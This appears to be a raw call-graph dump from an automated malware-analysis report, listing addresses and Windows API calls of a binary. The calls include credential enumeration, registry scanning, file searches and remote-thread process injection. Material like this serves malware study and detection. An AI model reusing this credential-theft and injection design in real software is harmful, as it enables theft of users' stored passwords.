6944 410440 RegQueryValueExA 6943->6944 6945 41050f RegCloseKey 6943->6945 6946 410506 RegCloseKey 6944->6946 6947 41046d 6944->6947 6945->6942 6946->6945 6948 404c9d 3 API calls 6947->6948 6949 41047a 6948->6949 6949->6946 6950 4104fd LocalFree 6949->6950 6951 4104bf memcpy memcpy 6949->6951 6950->6946 7027 4100a4 6951->7027 7043 406b3b 6953->7043 6956 404109 5 API calls 6957 41023a 6956->6957 6958 41036e 6957->6958 6960 41024d CredEnumerateW 6957->6960 6962 41025c 6957->6962 6959 404170 FreeLibrary 6958->6959 6961 40dcca 6959->6961 6960->6962 6961->6700 6968 410383 6961->6968 6962->6958 6963 410296 memset WideCharToMultiByte 6962->6963 7046 40fd01 memset memset 6962->7046 6963->6962 6964 4102d1 _strnicmp 6963->6964 6964->6962 6966 4102f6 WideCharToMultiByte 6966->6962 6967 410316 WideCharToMultiByte 6966->6967 6967->6962 6969 406b06 GetVersionExA 6968->6969 6971 41038e 6969->6971 6970 4103ed 6970->6700 6971->6970 7047 4028e7 6971->7047 6974 4103ca 7056 404380 memset 6974->7056 6975 4103ba _mbscpy 6975->6974 6978 404380 149 API calls 6978->6970 6980 40ff74 RegCloseKey 6979->6980 6981 40fe9a 6979->6981 6980->6678 6981->6980 6982 40ff18 6981->6982 6983 404c9d 3 API calls 6981->6983 6984 40ff60 6982->6984 7331 4029d9 strlen 6982->7331 6989 40fec1 6983->6989 6984->6980 6985 40ff10 6987 404ce0 FreeLibrary 6985->6987 6987->6982 6988 40ff3e RegQueryValueExA 6988->6984 6989->6985 6990 40fef1 memcpy 6989->6990 6991 40ff07 LocalFree 6989->6991 6990->6991 6991->6985 6993 40fe48 RegCloseKey 6992->6993 6994 40fd6c 6992->6994 6993->6681 6994->6993 6995 404c9d 3 API calls 6994->6995 6999 40fd97 6995->6999 6996 40fdec 6997 404ce0 FreeLibrary 6996->6997 6998 40fdf4 6997->6998 6998->6993 7002 4029d9 strlen 6998->7002 6999->6996 7000 40fde3 LocalFree 6999->7000 7001 40fdc7 memcpy 6999->7001 7000->6996 7001->7000 7003 40fe17 RegQueryValueExA 7002->7003 7003->6993 7004 40fe35 7003->7004 7004->6993 7006 404cf4 7005->7006 7007 404cea FreeLibrary 7005->7007 7006->6705 7007->7006 7009 404170 FreeLibrary 7008->7009 7010 404111 LoadLibraryA 7009->7010 7011 404122 GetProcAddress GetProcAddress GetProcAddress 7010->7011 7012 40416b 7010->7012 7013 404153 7011->7013 7012->6934 7016 404c9d 7012->7016 7014 404170 FreeLibrary 7013->7014 7015 40415d 7013->7015 7014->7012 7015->7012 7017 404ce0 FreeLibrary 7016->7017 7018 404ca5 LoadLibraryA 7017->7018 7019 404cd0 7018->7019 7020 404cb6 GetProcAddress 7018->7020 7021 404cdb 7019->7021 7023 404ce0 FreeLibrary 7019->7023 7020->7019 7022 404cc9 7020->7022 7021->6931 7021->6934 7022->7019 7023->7021 7025 404180 7024->7025 7026 404176 FreeLibrary 7024->7026 7025->6932 7026->7025 7028 414060 7027->7028 7029 4100b1 RegOpenKeyExA 7028->7029 7030 4100d6 memset 7029->7030 7031 4101fe 7029->7031 7032 4101e4 RegEnumKeyA 7030->7032 7031->6950 7033 410103 RegOpenKeyExA 7032->7033 7034 4101f5 RegCloseKey 7032->7034 7035 410125 RegQueryValueExA 7033->7035 7037 41014e 7033->7037 7034->7031 7036 4101cd RegCloseKey 7035->7036 7035->7037 7036->7037 7037->7032 7037->7036 7039 406958 2 API calls 7037->7039 7042 40fd01 memset memset 7037->7042 7040 41019d WideCharToMultiByte 7039->7040 7041 4101c2 LocalFree 7040->7041 7041->7036 7042->7037 7044 406b06 GetVersionExA 7043->7044 7045 406b40 7044->7045 7045->6956 7046->6966 7065 4066e3 7047->7065 7050 402918 7052 4066e3 strncat 7050->7052 7051 40293a 7051->6974 7051->6975 7053 402922 GetProcAddress 7052->7053 7054 402933 FreeLibrary 7053->7054 7055 40292e 7053->7055 7054->7051 7055->7054 7057 41223f 10 API calls 7056->7057 7058 4043b7 7057->7058 7059 40680e 2 API calls 7058->7059 7064 4043da 7058->7064 7060 4043c2 7059->7060 7069 406efe strlen strlen 7060->7069 7064->6978 7066 406712 7065->7066 7067 4066f0 strncat 7066->7067 7068 402901 GetModuleHandleA 7066->7068 7067->7066 7068->7050 7068->7051 7070 4043cc 7069->7070 7071 406f1b _mbscat 7069->7071 7072 4042aa 7070->7072 7071->7070 7087 40783b 7072->7087 7076 40436c 7123 407930 7076->7123 7079 406b3b GetVersionExA 7082 4042ee 7079->7082 7081 404326 7081->7082 7105 404220 7081->7105 7082->7076 7082->7079 7082->7081 7083 40430c _strnicmp 7082->7083 7085 4042aa 138 API calls 7082->7085 7086 407898 9 API calls 7082->7086 7119 407800 7082->7119 7083->7081 7083->7082 7085->7082 7086->7082 7088 407930 FindClose 7087->7088 7089 407846 7088->7089 7090 406958 2 API calls 7089->7090 7091 40785a strlen strlen 7090->7091 7092 407883 7091->7092 7093 4042e3 7091->7093 7094 406b4b 4 API calls 7092->7094 7095 407898 7093->7095 7094->7093 7096 4078a3 FindFirstFileA 7095->7096 7097 4078c4 FindNextFileA 7095->7097 7098 4078df 7096->7098 7099 4078e6 strlen strlen 7097->7099 7100 4078da 7097->7100 7098->7099 7104 40791f 7098->7104 7102 407916 7099->7102 7099->7104 7101 407930 FindClose 7100->7101 7101->7098 7103 406b4b 4 API calls 7102->7103 7103->7104 7104->7082 7126 4067ba CreateFileA 7105->7126 7107 404233 7108 4042a0 7107->7108 7109 40423e GetFileSize 7107->7109 7108->7081 7110 404253 ??2@YAPAXI 7109->7110 7111 404297 CloseHandle 7109->7111 7127 406ed6 ReadFile 7110->7127 7111->7108 7114 404290 ??3@YAXPAX 7114->7111 7115 406b3b GetVersionExA 7116 404275 7115->7116 7129 4049e6 7116->7129 7120 40780a strcmp 7119->7120 7122 407832 7119->7122 7121 407821 strcmp 7120->7121 7120->7122 7121->7122 7122->7082 7124 404377 7123->7124 7125 407939 FindClose 7123->7125 7124->7064 7125->7124 7126->7107 7128 404269 7127->7128 7128->7114 7128->7115 7168 4043e4 memset 7129->7168 7132 40428d 7132->7114 7133 404a04 OpenProcess 7133->7132 7134 404a1c memset GetModuleHandleA 7133->7134 7183 411ba1 7134->7183 7137 404a61 7139 411ba1 6 API calls 7137->7139 7138 404a66 GetProcAddress 7138->7137 7140 404a77 7139->7140 7141 404a82 7140->7141 7142 404a87 GetProcAddress 7140->7142 7143 411ba1 6 API calls 7141->7143 7142->7141 7144 404a98 7143->7144 7145 404aa3 7144->7145 7146 404aa8 GetProcAddress 7144->7146 7147 411ba1 6 API calls 7145->7147 7146->7145 7148 404ab9 7147->7148 7149 404ac4 7148->7149 7150 404ac9 GetProcAddress 7148->7150 7151 404acb VirtualAllocEx VirtualAllocEx VirtualAllocEx VirtualAllocEx 7149->7151 7150->7151 7152 404c57 VirtualFreeEx VirtualFreeEx VirtualFreeEx VirtualFreeEx CloseHandle 7151->7152 7153 404b2c 7151->7153 7152->7132 7153->7152 7154 404b46 WriteProcessMemory 7153->7154 7187 40496d _mbscat _mbscpy _mbscpy 7154->7187 7156 404b65 WriteProcessMemory WriteProcessMemory 7188 411fc6 GetVersionExA 7156->7188 7161 404c11 ??2@YAPAXI ReadProcessMemory 7163 404c31 7161->7163 7164 404c42 ??3@YAXPAX 7161->7164 7162 404c49 7162->7152 7165 404c4e FreeLibrary 7162->7165 7210 404915 7163->7210 7164->7162 7165->7152 7169 404436 _mbscpy 7168->7169 7170 404429 GetSystemDirectoryA 7168->7170 7171 40680e 2 API calls 7169->7171 7170->7169 7172 404450 7171->7172 7173 4028e7 4 API calls 7172->7173 7174 404455 7173->7174 7175 406efe 3 API calls 7174->7175 7176 40448f 7175->7176 7218 411147 7176->7218 7181 4044cd 7181->7132 7181->7133 7182 4044ac memcpy 7182->7181 7184 411bb3 GetModuleHandleA GetProcAddress 7183->7184 7185 404a50 7183->7185 7184->7185 7186 411be4 GetModuleHandleA GetProcAddress strlen strlen 7184->7186 7185->7137 7185->7138 7186->7185 7187->7156 7189 41206a CreateRemoteThread 7188->7189 7190 411fec 7188->7190 7192 404bac 7189->7192 7308 411f43 7190->7308 7193 4044de 7192->7193 7194 410daa 2 API calls 7193->7194 7196 4044f8 7194->7196 7195 404565 7197 404574 ResumeThread WaitForSingleObject CloseHandle memset ReadProcessMemory 7195->7197 7198 40456b FreeLibrary 7195->7198 7196->7195 7199 410d8a LoadLibraryA 7196->7199 7197->7161 7197->7162 7198->7197 7200 404509 7199->7200 7201 40455a CloseHandle 7200->7201 7202 40450d GetProcAddress 7200->7202 7201->7195 7203 404522 7202->7203 7204 404559 7202->7204 7203->7204 7205 410d8a LoadLibraryA 7203->7205 7204->7201 7206 404537 7205->7206 7207 404550 CloseHandle 7206->7207 7208 40453b GetProcAddress 7206->7208 7207->7204 7208->7207 7209 404549 7208->7209 7209->7207 7211 406b3b GetVersionExA 7210->7211 7212 40491c 7211->7212 7213 404920 7212->7213 7214 404939 7212->7214 7216 404937 7213->7216 7312 404890 7213->7312 7214->7216 7217 404890 15 API calls 7214->7217 7216->7164 7217->7214 7240 406b2a 7218->7240 7221 411150 7243 4110af 7221->7243 7222 411157 7253 41102b 7222->7253 7225 404495 7226 411560 7225->7226 7227 41156d 7226->7227 7228 406b2a GetVersionExA 7227->7228 7229 411575 7228->7229 7231 41158b memset 7229->7231 7232 41161e 7229->7232 7230 4044a3 7230->7181 7230->7182 7234 4115bf 7231->7234 7232->7230 7235 411650 _mbscpy 7232->7235 7236 411696 CloseHandle 7232->7236 7234->7230 7261 4112d9 7234->7261 7271 411172 7234->7271 7287 41172b 7234->7287 7238 41172b 8 API calls 7235->7238 7236->7230 7238->7232 7241 406b06 GetVersionExA 7240->7241 7242 406b2f 7241->7242 7242->7221 7242->7222 7244 4110bc LoadLibraryA 7243->7244 7245 411145 7243->7245 7244->7245 7246 4110ce GetProcAddress 7244->7246 7245->7225 7247 41112a 7246->7247 7248 4110e6 GetProcAddress 7246->7248 7247->7245 7249 41113e FreeLibrary 7247->7249 7248->7247 7250 4110f7 GetProcAddress 7248->7250 7249->7245 7250->7247 7251 411108 GetProcAddress 7250->7251 7251->7247 7252 411119 GetProcAddress 7251->7252 7252->7247 7254 411034 GetModuleHandleA 7253->7254 7260 4110a2 7253->7260 7255 411046 GetProcAddress 7254->7255 7254->7260 7256 41105e GetProcAddress 7255->7256 7255->7260 7257 41106f GetProcAddress 7256->7257 7256->7260 7258 411080 GetProcAddress 7257->7258 7257->7260 7259 411091 GetProcAddress 7258->7259 7258->7260 7259->7260 7260->7225 7262 406b2a GetVersionExA 7261->7262 7263 4112ea 7262->7263 7264 41133e 7263->7264 7265 4112ee 7263->7265 7292 411255 7264->7292 7266 411347 7265->7266 7267 4112f6 OpenProcess 7265->7267 7266->7234 7267->7266 7270 41130b CloseHandle 7267->7270 7270->7266 7272 411184 strchr 7271->7272 7274 411181 _mbscpy 7271->7274 7272->7274 7275 4111a4 7272->7275 7276 411250 7274->7276 7277 407139 3 API calls 7275->7277 7276->7234 7278 4111b3 7277->7278 7279 4111ba memset 7278->7279 7280 4111fd 7278->7280 7297 406bc3 7279->7297 7282 411202 memset 7280->7282 7283 411247 _mbscpy 7280->7283 7285 406bc3 2 API calls 7282->7285 7283->7276 7284 4111e0 _mbscpy _mbscat 7284->7276 7286 411228 memcpy _mbscat 7285->7286 7286->7276 7300 4116a9 strchr 7287->7300 7290 411743 memcpy 7291 411764 7290->7291 7291->7234 7293 4112b7 7292->7293 7294 411268 7292->7294 7293->7266 7294->7293 7295 4112b0 CloseHandle 7294->7295 7296 4112bc _mbscpy CloseHandle 7294->7296 7295->7293 7296->7293 7298 406bd2 GetWindowsDirectoryA 7297->7298 7299 406be3 _mbscpy 7297->7299 7298->7299 7299->7284 7301 4116d2 strchr 7300->7301 7306 4116c0 7300->7306 7302 4116ec memset 7301->7302 7301->7306 7304 406a87 _mbscpy strrchr 7302->7304 7303 4116c4 _strcmpi 7305 4116cb 7303->7305 7307 411715 _strcmpi 7304->7307 7305->7290 7305->7291 7306->7303 7307->7305 7309 411f4e LoadLibraryA 7308->7309 7311 411fc1 7308->7311 7310 411f63 GetProcAddress 7309->7310 7309->7311 7310->7311 7311->7192 7313 406b3b GetVersionExA 7312->7313 7315 4048a2 7313->7315 7314 40490b 7314->7216 7315->7314 7317 404578 wcslen memset 7315->7317 7318 406b3b GetVersionExA 7317->7318 7324 4045c7 7318->7324 7319 404649 wcschr 7321 40465c wcsncmp 7319->7321 7319->7324 7320 406b3b GetVersionExA 7320->7324 7321->7324 7322 404c9d LoadLibraryA GetProcAddress FreeLibrary 7322->7324 7323 404824 memcpy 7323->7324 7324->7319 7324->7320 7324->7321 7324->7322 7324->7323 7325 404ce0 FreeLibrary 7324->7325 7326 40487f 7324->7326 7327 4046f1 memcpy wcschr 7324->7327 7328 4047d8 memcpy LocalFree 7324->7328 7325->7324 7326->7314 7329 404720 wcscpy 7327->7329 7330 404732 LocalFree 7327->7330 7328->7324 7329->7330 7330->7324 7332 4029f8 7331->7332 7332->6988 7333->6709 7334->6718 7335->6718 7337 4029d9 strlen 7336->7337 7338 4024a4 7337->7338 7339 4024b7 ??2@YAPAXI ??2@YAPAXI memcpy 7338->7339 7340 4024ac 7338->7340 7341 4025c8 7339->7341 7340->6726 7340->6727 7342 4025ea ??3@YAXPAX ??3@YAXPAX 7341->7342 7342->7340 7343->6733 7344->6739 7345->6739 7347 411d82 RegQueryValueExA 7346->7347 7348 40275e 7347->7348 7349 40282d RegCloseKey 7348->7349 7350 40276a strtoul 7348->7350 7349->6739 7350->7350 7351 402794 7350->7351 7352 4027ee _mbscpy _mbscpy 7351->7352 7352->7349 7353->6739 7365 411d68 RegOpenKeyExA 7354->7365 7356 413772 7357 40da13 7356->7357 7358 411d82 RegQueryValueExA 7356->7358 7357->6746 7357->6749 7359 41378b 7358->7359 7360 4137bc RegCloseKey 7359->7360 7361 411d82 RegQueryValueExA 7359->7361 7360->7357 7362 4137a6 7361->7362 7362->7360 7366 413a5a 7362->7366 7365->7356 7378 413646 strlen 7366->7378 7368 413a73 7369 413a92 7368->7369 7380 4137ce 7368->7380 7373 4137ba 7369->7373 7409 413b1d memset memset memset 7369->7409 7372 413aab 7372->7373 7374 413acb memset 7372->7374 7373->7360 7375 4137ce 21 API calls 7374->7375 7376 413afc 7375->7376 7376->7373 7377 413b05 _mbscpy 7376->7377 7377->7373 7379 413665 7378->7379 7379->7368 7381 414060 7380->7381 7382 4137db memset 7381->7382 7383 413646 strlen 7382->7383 7384 413809 strlen 7383->7384 7385 413a51 7384->7385 7386 413822 7384->7386 7385->7369 7386->7385 7387 41382a memset memset memset memset 7386->7387 7388 4138a4 7387->7388 7424 40c929 7388->7424 7390 4138b2 7431 40c9c7 7390->7431 7392 4138c1 memcpy 7393 4138dd 7392->7393 7394 40c929 3 API calls 7393->7394 7395 4138ee 7394->7395 7396 40c9c7 5 API calls 7395->7396 7397 4138fa memcpy memcpy 7396->7397 7398 413928 7397->7398 7399 40c929 3 API calls 7398->7399 7400 413939 7399->7400 7401 40c9c7 5 API calls 7400->7401 7403 413945 7401->7403 7402 4139e2 _mbscpy 7404 413a00 7402->7404 7403->7402 7403->7403 7405 40c929 3 API calls 7404->7405 7406 413a0e 7405->7406 7407 40c9c7 5 API calls 7406->7407 7408 413a1a memcpy memcpy 7407->7408 7408->7385 7410 413646 strlen 7409->7410 7411 413b81 strlen 7410->7411 7412 413b99 7411->7412 7423 413c28 7411->7423 7413 413ba1 memcpy memcpy 7412->7413 7412->7423 7414 413bcf 7413->7414 7415 40c929 3 API calls 7414->7415 7416 413be1 7415->7416 7417 40c9c7 5 API calls 7416->7417 7418 413bf0 memcpy 7417->7418 7419 413c0e 7418->7419 7420 40c929 3 API calls 7419->7420 7421 413c1f 7420->7421 7422 40c9c7 5 API calls 7421->7422 7422->7423 7423->7372 7425 40c940 7424->7425 7426 40c960 memcpy 7425->7426 7427 40c967 memcpy 7425->7427 7430 40c97e 7425->7430 7426->7390 7427->7430 7428 40c98d memcpy 7428->7430 7430->7426 7430->7428 7432 40c9e1 memset 7431->7432 7433 40ca07 memset 7431->7433 7438 40ca46 7432->7438 7435 40ca16 7433->7435 7437 40ca2c memcpy memset 7435->7437 7436 40c9f7 memset 7436->7435 7437->7392 7438->7436 7454 411d68 RegOpenKeyExA 7439->7454 7441 40d7b8 7442 40d7c3 memset 7441->7442 7443 40d92b 7441->7443 7445 40d7f1 7442->7445 7443->6753 7443->6754 7446 40d922 RegCloseKey 7445->7446 7448 40d80f RegQueryValueExA 7445->7448 7449 40d8f9 RegCloseKey 7445->7449 7451 40d85a memset 7445->7451 7453 40d88b _mbscpy _mbscpy 7445->7453 7455 411d68 RegOpenKeyExA 7445->7455 7467 411dee RegEnumKeyExA 7445->7467 7446->7443 7448->7449 7450 40d839 atoi 7448->7450 7449->7445 7450->7445 7450->7449 7456 40807d memcpy memcpy 7451->7456 7453->7445 7454->7441 7455->7445 7457 4080b0 7456->7457 7458 40c929 3 API calls 7457->7458 7459 4080bf 7458->7459 7460 40c9c7 5 API calls 7459->7460 7461 4080cb 7460->7461 7461->7461 7462 40810c memset 7461->7462 7465 408194 7461->7465 7464 408138 7462->7464 7463 40815f strlen 7463->7465 7466 40816b _mbscpy _mbscpy 7463->7466 7464->7463 7465->7445 7466->7465 7467->7445 7469 407dc4 7468->7469 7470 411d68 RegOpenKeyExA 7469->7470 7470->6760 7471->6766 7472->6766 7475 407e51 7473->7475 7474 407f77 RegCloseKey 7474->6766 7475->7474 7476 407e65 memset 7475->7476 7477 407e96 7476->7477 7478 404c9d 3 API calls 7477->7478 7481 407ede 7478->7481 7479 407f6f 7480 404ce0 FreeLibrary 7479->7480 7480->7474 7481->7479 7482 407f25 memcpy 7481->7482 7483 406958 2 API calls 7482->7483 7484 407f59 LocalFree 7483->7484 7484->7479 7486->6766 7487->6775 7488->6781 7489->6781 7491 407b01 7490->7491 7492 407bbf RegCloseKey 7490->7492 7493 404c9d 3 API calls 7491->7493 7492->6781 7495 407b12 7493->7495 7494 404ce0 FreeLibrary 7494->7492 7496 407b3e WideCharToMultiByte LocalFree 7495->7496 7502 407baa 7495->7502 7497 411d82 RegQueryValueExA 7496->7497 7498 407b87 7497->7498 7499 411d82 RegQueryValueExA 7498->7499 7500 407b9c 7499->7500 7501 406958 2 API calls 7500->7501 7501->7502 7502->7494 7503->6781 7504->6792 7522 4067ba CreateFileA 7505->7522 7507 410ad6 7508 410ae3 GetFileSize 7507->7508 7509 410b8e 7507->7509 7523 407a56 7508->7523 7509->6793 7511 410b07 7512 407a56 2 API calls 7511->7512 7513 410b1a 7512->7513 7514 406ed6 ReadFile 7513->7514 7515 410b31 7514->7515 7516 410b75 CloseHandle 7515->7516 7518 410b50 WideCharToMultiByte 7515->7518 7545 407a41 7516->7545 7526 4108fa 7518->7526 7520 407a41 ??3@YAXPAX 7520->7509 7522->7507 7524 407a6a ??2@YAPAXI 7523->7524 7525 407a5c ??3@YAXPAX 7523->7525 7524->7511 7525->7524 7527 410907 7526->7527 7528 404c9d 3 API calls 7527->7528 7529 41091d 7528->7529 7530 410925 memset 7529->7530 7531 410ab6 7529->7531 7548 407193 7530->7548 7532 404ce0 FreeLibrary 7531->7532 7534 410abe 7532->7534 7534->7516 7535 410958 7535->7531 7536 41096b memset 7535->7536 7537 407193 memcpy 7535->7537 7539 4109b8 MultiByteToWideChar 7535->7539 7540 4109e0 memset 7535->7540 7542 40720f 2 API calls 7535->7542 7543 410a51 LocalFree 7535->7543 7544 410a2f memcpy 7535->7544 7552 40720f 7536->7552 7537->7535 7539->7535 7541 4029d9 strlen 7540->7541 7541->7535 7542->7535 7543->7535 7544->7543 7546 407a55 7545->7546 7547 407a47 ??3@YAXPAX 7545->7547 7546->7520 7547->7546 7549 4071aa 7548->7549 7551 4071a6 7548->7551 7550 4071d4 memcpy 7549->7550 7549->7551 7550->7551 7551->7535 7553 407221 7552->7553 7556 407228 7552->7556 7553->7535 7554 407236 strchr 7554->7556 7555 407269 memcpy 7555->7556 7556->7553 7556->7554 7556->7555 7557->6798 7558->6807 7559->6807 7561 410eb7 7560->7561 7561->6807 7562->6807 7563->6817 7578 4067ba CreateFileA 7564->7578 7566 405af9 7567 405b02 GetFileSize 7566->7567 7568 405b53 7566->7568 7569 405b12 7567->7569 7570 405b4a CloseHandle 7567->7570 7568->6819 7571 407a56 2 API calls 7569->7571 7570->7568 7572 405b23 7571->7572 7573 406ed6 ReadFile 7572->7573 7574 405b32 7573->7574 7579 405865 memset 7574->7579 7577 407a41 ??3@YAXPAX 7577->7570 7578->7566 7580 407193 memcpy 7579->7580 7588 4058c3 7580->7588 7581 405ae1 7581->7577 7582 406958 2 API calls 7582->7588 7583 405902 strlen 7583->7588 7584 40593d memset memset 7584->7588 7585 4070e4 strlen strlen memcmp 7585->7588 7586 407193 memcpy 7586->7588 7588->7581 7588->7582 7588->7583 7588->7584 7588->7585 7588->7586 7589 406d5a strtoul 7588->7589 7589->7588 7591 40f9b6 7590->7591 7641 40fa34 7591->7641 7594 40fa27 7654 40733e free free 7594->7654 7596 40e6a8 strrchr 7596->6824 7599 40f9d1 7600 40fa11 7599->7600 7655 406d2b 7599->7655 7600->7594 7601 406958 2 API calls 7600->7601 7602 40fa26 7601->7602 7602->7594 7686 410c4c memset 7603->7686 7606 406521 memset 7608 406958 2 API calls 7606->7608 7607 4066d9 7638 410d6f 7607->7638 7609 40654d 7608->7609 7610 40656e memset memset memset strlen strlen 7609->7610 7635 4066c1 7609->7635 7611 4065d5 7610->7611 7612 4065e4 strlen strlen 7610->7612 7614 406b4b 4 API calls 7611->7614 7616 40661d strlen strlen 7612->7616 7617 40660e 7612->7617 7613 410d6f 2 API calls 7613->7607 7614->7612 7620 406647 7616->7620 7621 406656 7616->7621 7618 406b4b 4 API calls 7617->7618 7618->7616 7622 406b4b 4 API calls 7620->7622 7696 4069d3 GetFileAttributesA 7621->7696 7622->7621 7624 40666d 7625 406681 7624->7625 7626 406672 7624->7626 7716 4069d3 GetFileAttributesA 7625->7716 7697 4062db 7626->7697 7629 40668d 7630 4066a1 7629->7630 7631 406692 7629->7631 7717 4069d3 GetFileAttributesA 7630->7717 7632 4062db 21 API calls 7631->7632 7632->7630 7634 4066ad 7634->7635 7636 4066b2 7634->7636 7635->7613 7637 4062db 21 API calls 7636->7637 7637->7635 7639 410d74 SetCurrentDirectoryA FreeLibrary 7638->7639 7640 40e71c 7638->7640 7639->7640 7640->6829 7642 40fa48 7641->7642 7660 40fc4f memset memset 7642->7660 7644 40fa4e 7645 40fb5b 7644->7645 7647 40fa66 memset 7644->7647 7649 40fa8a strlen strlen 7644->7649 7650 406b4b strlen _mbscat _mbscpy _mbscat 7644->7650 7651 40faec strlen strlen 7644->7651 7652 4069d3 GetFileAttributesA 7644->7652 7653 407364 7 API calls 7644->7653 7673 40733e free free 7645->7673 7647->7644 7648 40f9bc 7648->7594 7648->7599 7649->7644 7650->7644 7651->7644 7652->7644 7653->7644 7654->7596 7685 4067ba CreateFileA 7655->7685 7657 406d38 7658 406d55 CompareFileTime 7657->7658 7659 406d3f GetFileTime CloseHandle 7657->7659 7658->7599 7659->7658 7661 41223f 10 API calls 7660->7661 7662 40fc9e 7661->7662 7663 40680e 2 API calls 7662->7663 7664 40fca5 _mbscat 7663->7664 7665 41223f 10 API calls 7664->7665 7666 40fcc6 7665->7666 7667 40680e 2 API calls 7666->7667 7668 40fccd _mbscat 7667->7668 7674 40fb6a 7668->7674 7671 40fb6a 22 API calls 7672 40fcfa 7671->7672 7672->7644 7673->7648 7675 40783b 9 API calls 7674->7675 7684 40fb9e 7675->7684 7676 40fc3e 7677 407930 FindClose 7676->7677 7678 40fc49 7677->7678 7678->7671 7679 407364 7 API calls 7679->7684 7680 40783b 9 API calls 7680->7684 7681 407898 9 API calls 7681->7684 7682 407800 strcmp strcmp 7682->7684 7683 407930 FindClose 7683->7684 7684->7676 7684->7679 7684->7680 7684->7681 7684->7682 7684->7683 7685->7657 7718 405ec5 memset memset 7686->7718 7689 406519 7689->7606 7689->7607 7690 410c8d GetCurrentDirectoryA SetCurrentDirectoryA memset strlen strlen 7691 410cf3 LoadLibraryExA 7690->7691 7692 410cdc 7690->7692 7691->7689 7695 410d17 6 API calls 7691->7695 7693 406b4b 4 API calls 7692->7693 7693->7691 7695->7689 7696->7624 7698 4062e8 7697->7698 7750 4067ba CreateFileA 7698->7750 7700 4062f3 7701 406302 GetFileSize 7700->7701 7702 4064f4 7700->7702 7703 406316 ??2@YAPAXI 7701->7703 7704 4064eb CloseHandle 7701->7704 7702->7625 7705 406ed6 ReadFile 7703->7705 7704->7702 7706 40632c memset memset memset 7705->7706 7751 4060c4 7706->7751 7708 4064e2 ??3@YAXPAX 7708->7704 7709 4063ad strcmp 7711 406395 7709->7711 7710 4060c4 memcpy 7710->7711 7711->7708 7711->7709 7711->7710 7712 40644e _mbscpy 7711->7712 7713 40645d _mbscpy 7711->7713 7715 4064a7 strcmp 7711->7715 7712->7711 7755 40623f 7713->7755 7715->7711 7716->7629 7717->7634 7740 411d68 RegOpenKeyExA 7718->7740 7720 405f1c 7721 406072 _mbscpy 7720->7721 7722 405f27 memset 7720->7722 7724 406085 ExpandEnvironmentStringsA 7721->7724 7725 4060b0 7721->7725 7741 411dee RegEnumKeyExA 7722->7741 7726 405e4a 8 API calls 7724->7726 7725->7689 7725->7690 7727 406098 7726->7727 7727->7725 7731 4060a2 GetCurrentDirectoryA 7727->7731 7728 406069 RegCloseKey 7728->7721 7729 405f5a _mbsnbicmp 7730 405f78 memset memset _snprintf 7729->7730 7736 405f52 7729->7736 7734 411dae 3 API calls 7730->7734 7732 405e4a 8 API calls 7731->7732 7732->7725 7735 405fd9 _mbsrchr 7734->7735 7735->7736 7736->7728 7736->7729 7738 406004 _mbsicmp 7736->7738 7742 405e4a memset strlen strlen 7736->7742 7748 411dee RegEnumKeyExA 7736->7748 7738->7736 7739 40601d _mbscpy _mbscpy 7738->7739 7739->7736 7740->7720 7741->7736 7743 405e91 7742->7743 7744 405ea0 7742->7744 7745 406b4b 4 API calls 7743->7745 7749 4069d3 GetFileAttributesA 7744->7749 7745->7744 7747 405eb7 7747->7736 7748->7736 7749->7747 7750->7700 7752 4060db 7751->7752 7754 4060d7 7751->7754 7753 406106 memcpy 7752->7753 7752->7754 7753->7754 7754->7711 7756 40624c 7755->7756 7757 406259 _mbscpy 7756->7757 7763 406143 7757->7763 7760 406143 3 API calls 7761 406290 _mbscpy _mbscpy _mbscpy 7760->7761 7762 4062d6 7761->7762 7762->7711 7764 406163 7763->7764 7765 406174 7763->7765 7766 406180 memset 7764->7766 7767 40616c 7764->7767 7765->7760 7769 4029d9 strlen 7766->7769 7768 4029d9 strlen 7767->7768 7768->7765 7770 4061a7 7769->7770 7770->7765 7771 406214 memcpy 7770->7771 7771->7765 7773 4085c6 7772->7773 7801 40733e free free 7773->7801 7775 408602 7802 40821a 7775->7802 7777 4085d3 7777->7775 7825 407407 7777->7825 7781 4086db 7789 40733e free free 7781->7789 7782 4086d3 7783 404d18 7 API calls 7782->7783 7783->7781 7784 408649 MultiByteToWideChar _wcslwr 7830 408490 7784->7830 7787 408610 7787->7781 7787->7782 7787->7784 7788 408490 17 API calls 7787->7788 7788->7787 7789->6836 7791 4081b7 7790->7791 7792 4081ac FreeLibrary 7790->7792 7793 407491 free 7791->7793 7792->7791 7794 4081c0 7793->7794 7868 40733e free free 7794->7868 7796 4081c8 7869 40733e free free 7796->7869 7798 4081d0 7870 40733e free free 7798->7870 7800 4081d8 7801->7777 7844 40733e free free 7802->7844 7804 408233 7845 411d68 RegOpenKeyExA 7804->7845 7806 408246 7807 408251 7806->7807 7808 408356 7806->7808 7809 40746b 4 API calls 7807->7809 7822 404d18 7808->7822 7810 408269 memset 7809->7810 7846 4074aa 7810->7846 7813 40834c RegCloseKey 7813->7808 7814 4082bd 7815 4082c6 _strupr 7814->7815 7816 407364 7 API calls 7815->7816 7817 4082e4 7816->7817 7818 407364 7 API calls 7817->7818 7819 4082f8 memset 7818->7819 7820 4074aa 7819->7820 7821 408327 RegEnumValueA 7820->7821 7821->7813 7821->7815 7823 404d79 7822->7823 7824 404d1d 7 API calls 7822->7824 7823->7787 7824->7823 7848 407428 7825->7848 7828 407424 7828->7777 7829 407364 7 API calls 7829->7828 7831 404d18 7 API calls 7830->7831 7832 4084a6 7831->7832 7833 4085a8 wcslen 7832->7833 7834 4084cb wcslen 7832->7834 7833->7787 7835 404d18 7 API calls 7834->7835 7837 4084e4 7835->7837 7836 40859e 7839 404d18 7 API calls 7836->7839 7837->7836 7838 404d18 7 API calls 7837->7838 7840 40851d 7838->7840 7839->7833 7840->7836 7841 40853a memset 7840->7841 7842 408560 7841->7842 7852 4083d0 7842->7852 7844->7804 7845->7806 7847 4074b0 RegEnumValueA 7846->7847 7847->7813 7847->7814 7849 40742e 7848->7849 7850 407437 strcmp 7849->7850 7851 407413 7849->7851 7850->7849 7850->7851 7851->7828 7851->7829 7853 407428 strcmp 7852->7853 7854 4083e3 7853->7854 7855 40848a 7854->7855 7856 40841f wcslen 7854->7856 7855->7836 7857 404c9d 3 API calls 7856->7857 7860 408447 7857->7860 7858 408482 7859 404ce0 FreeLibrary 7858->7859 7859->7855 7860->7858 7861 408479 LocalFree 7860->7861 7863 40835f 7860->7863 7861->7858 7864 4083c9 7863->7864 7867 408377 7863->7867 7864->7861 7865 408382 wcslen 7865->7864 7866 40839b wcslen 7865->7866 7866->7867 7867->7864 7867->7865 7868->7796 7869->7798 7870->7800 7872 40e506 7871->7872 7873 40e515 7871->7873 7874 406b4b 4 